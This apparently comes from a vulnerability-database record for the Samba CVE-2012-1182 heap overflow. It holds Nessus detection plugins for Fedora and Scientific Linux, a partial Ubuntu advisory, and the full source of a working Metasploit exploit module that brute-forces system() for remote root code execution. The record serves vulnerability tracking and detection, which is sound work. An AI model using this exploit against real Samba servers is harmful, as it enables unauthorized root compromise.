script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"samba4-4.0.0-38.alpha16.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T23:22:22", "bulletinFamily": "scanner", "description": "This update fixes CVE-2012-1182.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2012-05-04T00:00:00", "id": "FEDORA_2012-6349.NASL", "href": "https://www.tenable.com/plugins/nessus/58980", "published": "2012-05-04T00:00:00", "title": "Fedora 15 : samba4-4.0.0-26.alpha11.fc15.6 (2012-6349)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-6349.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58980);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"FEDORA\", value:\"2012-6349\");\n\n script_name(english:\"Fedora 15 : samba4-4.0.0-26.alpha11.fc15.6 (2012-6349)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2012-1182.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/079715.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8c44225e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"samba4-4.0.0-26.alpha11.fc15.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-18T02:47:08", "bulletinFamily": "scanner", "description": "Samba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite", "modified": "2012-08-01T00:00:00", "id": "SL_20120410_SAMBA3X_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61297", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : samba3x on SL5.x i386/x86_64 (20120410)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61297);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Scientific Linux Security Update : samba3x on SL5.x i386/x86_64 (20120410)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1204&L=scientific-linux-errata&T=0&P=565\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6fceb855\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-debuginfo-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-winbind-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-winbind-devel-3.5.10-0.108.el5_8\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T17:25:25", "bulletinFamily": "exploit", "description": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow. CVE-2012-1182. Remote exploit for linux platform", "modified": "2012-10-10T00:00:00", "published": "2012-10-10T00:00:00", "id": "EDB-ID:21850", "href": "https://www.exploit-db.com/exploits/21850/", "type": "exploitdb", "title": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::DCERPC\r\n\tinclude Msf::Exploit::Remote::SMB\r\n\tinclude Msf::Exploit::Brute\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Samba SetInformationPolicy AuditEventsInfo Heap Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module triggers a vulnerability in the LSA RPC service of the Samba daemon\r\n\t\t\t\tbecause of an error on the PIDL auto-generated code. Making a specially crafted\r\n\t\t\t\tcall to SetInformationPolicy to set a PolicyAuditEventsInformation allows to\r\n\t\t\t\ttrigger a heap overflow and finally execute arbitrary code with root privileges.\r\n\r\n\t\t\t\tThe module uses brute force to guess the system() address and redirect flow there\r\n\t\t\t\tin order to bypass NX. The start and stop addresses for brute forcing have been\r\n\t\t\t\tcalculated empirically. On the other hand the module provides the StartBrute and\r\n\t\t\t\tStopBrute which allow the user to configure his own addresses.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Vulnerability discovery\r\n\t\t\t\t\t'blasty', # Exploit\r\n\t\t\t\t\t'mephos', # Debian Squeeze target\r\n\t\t\t\t\t'sinn3r', # Metasploit module\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2012-1182'],\r\n\t\t\t\t\t['OSVDB', '81303'],\r\n\t\t\t\t\t['BID', '52973'],\r\n\t\t\t\t\t['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-069/']\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 811,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic bash telnet python perl'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e \"print system\"` | grep '$1'\r\n\t\t\t\t\t['2:3.5.11~dfsg-1ubuntu2 and 2:3.5.8~dfsg-1ubuntu2 on Ubuntu 11.10',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 0x11c0,\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t# The start for the final version should be 0xb20 aligned, and then step 0x1000.\r\n\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0x00230b20 },\r\n\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0x22a00b20 },\r\n\t\t\t\t\t\t\t\t'Step' => 0x1000\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t['2:3.5.8~dfsg-1ubuntu2 and 2:3.5.4~dfsg-1ubuntu8 on Ubuntu 11.04',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 0x11c0,\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t# The start should be 0x950 aligned, and then step 0x1000.\r\n\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0x00230950 },\r\n\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0x22a00950 },\r\n\t\t\t\t\t\t\t\t'Step' => 0x1000\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 10.10',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 0x11c0,\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t# The start should be 0x680 aligned, and then step 0x1000.\r\n\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0x00230680 },\r\n\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0x22a00680 },\r\n\t\t\t\t\t\t\t\t'Step' => 0x1000\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 0x11c0,\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t# The start should be 0x680 aligned, and then step 0x1000.\r\n\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6aaa1b0 },\r\n\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xb6ce91b0 },\r\n\t\t\t\t\t\t\t\t'Step' => 0x1000\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Apr 10 2012',\r\n\t\t\t'DefaultTarget' => 0\r\n\t\t\t))\r\n\r\n\t\tregister_options([\r\n\t\t\tOptInt.new(\"StartBrute\", [ false, \"Start Address For Brute Forcing\" ]),\r\n\t\t\tOptInt.new(\"StopBrute\", [ false, \"Stop Address For Brute Forcing\" ])\r\n\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tif target.bruteforce?\r\n\t\t\tbf = target.bruteforce\r\n\r\n\t\t\tif datastore['StartBrute'] and datastore['StartBrute'] > 0\r\n\t\t\t\tbf.start_addresses['Ret'] = datastore['StartBrute']\r\n\t\t\tend\r\n\r\n\t\t\tif datastore['StopBrute'] and datastore['StopBrute'] > 0\r\n\t\t\t\tbf.stop_addresses['Ret'] = datastore['StopBrute']\r\n\t\t\tend\r\n\r\n\t\t\tif bf.start_addresses['Ret'] > bf.stop_addresses['Ret']\r\n\t\t\t\traise ArgumentError, \"StartBrute should not be larger than StopBrute\"\r\n\t\t\tend\r\n\t\tend\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef check\r\n\t\tbegin\r\n\t\t\tconnect()\r\n\t\t\tsmb_login()\r\n\t\t\tdisconnect()\r\n\r\n\t\t\tversion = smb_peer_lm().scan(/Samba (\\d\\.\\d.\\d*)/).flatten[0]\r\n\t\t\tminor = version.scan(/\\.(\\d*)$/).flatten[0].to_i\r\n\t\t\tprint_status(\"Version found: #{version}\")\r\n\r\n\t\t\treturn Exploit::CheckCode::Appears if version =~ /^3\\.4/ and minor < 16\r\n\t\t\treturn Exploit::CheckCode::Appears if version =~ /^3\\.5/ and minor < 14\r\n\t\t\treturn Exploit::CheckCode::Appears if version =~ /^3\\.6/ and minor < 4\r\n\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\r\n\t\trescue ::Exception\r\n\t\t\treturn CheckCode::Unknown\r\n\t\tend\r\n\tend\r\n\r\n\tdef brute_exploit(target_addrs)\r\n\r\n\t\tprint_status(\"Trying to exploit Samba with address 0x%.8x...\" % target_addrs['Ret'])\r\n\t\tdatastore['DCERPC::fake_bind_multi'] = false\r\n\t\tdatastore['DCERPC::max_frag_size'] = 4248\r\n\r\n\t\tpipe = \"lsarpc\"\r\n\r\n\t\tprint_status(\"Connecting to the SMB service...\")\r\n\t\tconnect()\r\n\t\tprint_status(\"Login to the SMB service...\")\r\n\t\tsmb_login()\r\n\r\n\t\thandle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', [\"\\\\#{pipe}\"])\r\n\t\tprint_status(\"Binding to #{handle} ...\")\r\n\t\tdcerpc_bind(handle)\r\n\t\tprint_status(\"Bound to #{handle} ...\")\r\n\r\n\t\tstub = \"X\" * 20\r\n\r\n\t\tcmd = \";;;;\" # padding\r\n\t\tcmd << \"#{payload.encoded}\\x00\" # system argument\r\n\t\ttmp = cmd * (816/cmd.length)\r\n\t\ttmp << \"\\x00\"*(816-tmp.length)\r\n\r\n\t\tstub << NDR.short(2) # level\r\n\t\tstub << NDR.short(2) # level 2\r\n\t\tstub << NDR.long(1) # auditing mode\r\n\t\tstub << NDR.long(1) # ptr\r\n\t\tstub << NDR.long(100000) # r-> count\r\n\t\tstub << NDR.long(20) # array size\r\n\t\tstub << NDR.long(0)\r\n\t\tstub << NDR.long(100)\r\n\t\tstub << rand_text_alpha(target['Offset'])\r\n\t\t# Crafted talloc chunk\r\n\t\tstub << 'A' * 8 # next, prev\r\n\t\tstub << NDR.long(0) + NDR.long(0) # parent, child\r\n\t\tstub << NDR.long(0) # refs\r\n\t\tstub << NDR.long(target_addrs['Ret']) # destructor # will become EIP\r\n\t\tstub << NDR.long(0) # name\r\n\t\tstub << \"AAAA\" # size\r\n\t\tstub << NDR.long(0xe8150c70) # flags\r\n\t\tstub << \"AAAABBBB\"\r\n\t\tstub << tmp # pointer to tmp+4 in $esp\r\n\t\tstub << rand_text(32632)\r\n\t\tstub << rand_text(62000)\r\n\r\n\t\tprint_status(\"Calling the vulnerable function...\")\r\n\r\n\t\tbegin\r\n\t\t\tcall(dcerpc, 0x08, stub)\r\n\t\trescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError\r\n\t\t\tprint_status('Server did not respond, this is expected')\r\n\t\trescue Rex::Proto::DCERPC::Exceptions::Fault\r\n\t\t\tprint_error('Server is most likely patched...')\r\n\t\trescue => e\r\n\t\t\tif e.to_s =~ /STATUS_PIPE_DISCONNECTED/\r\n\t\t\t\tprint_status('Server disconnected, this is expected')\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\n\t# Perform a DCE/RPC Function Call\r\n\tdef call(dcerpc, function, data, do_recv = true)\r\n\r\n\t\tfrag_size = data.length\r\n\t\tif dcerpc.options['frag_size']\r\n\t\t\tfrag_size = dcerpc.options['frag_size']\r\n\t\tend\r\n\t\tobject_id = ''\r\n\t\tif dcerpc.options['object_call']\r\n\t\t\tobject_id = dcerpc.handle.uuid[0]\r\n\t\tend\r\n\t\tif options['random_object_id']\r\n\t\t\tobject_id = Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))\r\n\t\tend\r\n\r\n\t\tcall_packets = make_request(function, data, frag_size, dcerpc.context, object_id)\r\n\t\tcall_packets.each { |packet|\r\n\t\t\twrite(dcerpc, packet)\r\n\t\t}\r\n\r\n\t\treturn true if not do_recv\r\n\r\n\t\traw_response = ''\r\n\r\n\t\tbegin\r\n\t\t\traw_response = dcerpc.read()\r\n\t\trescue ::EOFError\r\n\t\t\traise Rex::Proto::DCERPC::Exceptions::NoResponse\r\n\t\tend\r\n\r\n\t\tif (raw_response == nil or raw_response.length == 0)\r\n\t\t\traise Rex::Proto::DCERPC::Exceptions::NoResponse\r\n\t\tend\r\n\r\n\r\n\t\tdcerpc.last_response = Rex::Proto::DCERPC::Response.new(raw_response)\r\n\r\n\t\tif dcerpc.last_response.type == 3\r\n\t\t\te = Rex::Proto::DCERPC::Exceptions::Fault.new\r\n\t\t\te.fault = dcerpc.last_response.status\r\n\t\t\traise e\r\n\t\tend\r\n\r\n\t\tdcerpc.last_response.stub_data\r\n\tend\r\n\r\n\t# Used to create standard DCERPC REQUEST packet(s)\r\n\tdef make_request(opnum=0, data=\"\", size=data.length, ctx=0, object_id = '')\r\n\r\n\t\topnum = opnum.to_i\r\n\t\tsize = size.to_i\r\n\t\tctx = ctx.to_i\r\n\r\n\t\tchunks, frags = [], []\r\n\t\tptr = 0\r\n\r\n\t\t# Break the request into fragments of 'size' bytes\r\n\t\twhile ptr < data.length\r\n\t\t\tchunks.push( data[ ptr, size ] )\r\n\t\t\tptr += size\r\n\t\tend\r\n\r\n\t\t# Process requests with no stub data\r\n\t\tif chunks.length == 0\r\n\t\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, '', ctx, object_id) )\r\n\t\t\treturn frags\r\n\t\tend\r\n\r\n\t\t# Process requests with only one fragment\r\n\t\tif chunks.length == 1\r\n\t\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, chunks[0], ctx, object_id) )\r\n\t\t\treturn frags\r\n\t\tend\r\n\r\n\t\t# Create the first fragment of the request\r\n\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(1, opnum, chunks.shift, ctx, object_id) )\r\n\r\n\t\t# Create all of the middle fragments\r\n\t\twhile chunks.length != 1\r\n\t\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(0, opnum, chunks.shift, ctx, object_id) )\r\n\t\tend\r\n\r\n\t\t# Create the last fragment of the request\r\n\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(2, opnum, chunks.shift, ctx, object_id) )\r\n\r\n\t\treturn frags\r\n\tend\r\n\r\n\t# Write data to the underlying socket\r\n\tdef write(dcerpc, data)\r\n\t\tdcerpc.socket.write(data)\r\n\t\tdata.length\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/21850/"}], "ubuntu": [{"lastseen": "2019-05-29T17:23:10", "bulletinFamily": "unix", "description": "Brian Gorenc discovered that Samba incorrectly calculated array bounds when handling remote procedure calls (RPC) over the network. A remote, unauthenticated attacker could exploit this to execute arbitrary code as the root user. (CVE-2012-1182)", "modified": "2012-04-13T00:00:00", "published": "2012-04-13T00:00:00", "id": "USN-1423-1", "href": "https://usn.ubuntu.com/1423-1/", "title": "Samba vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": 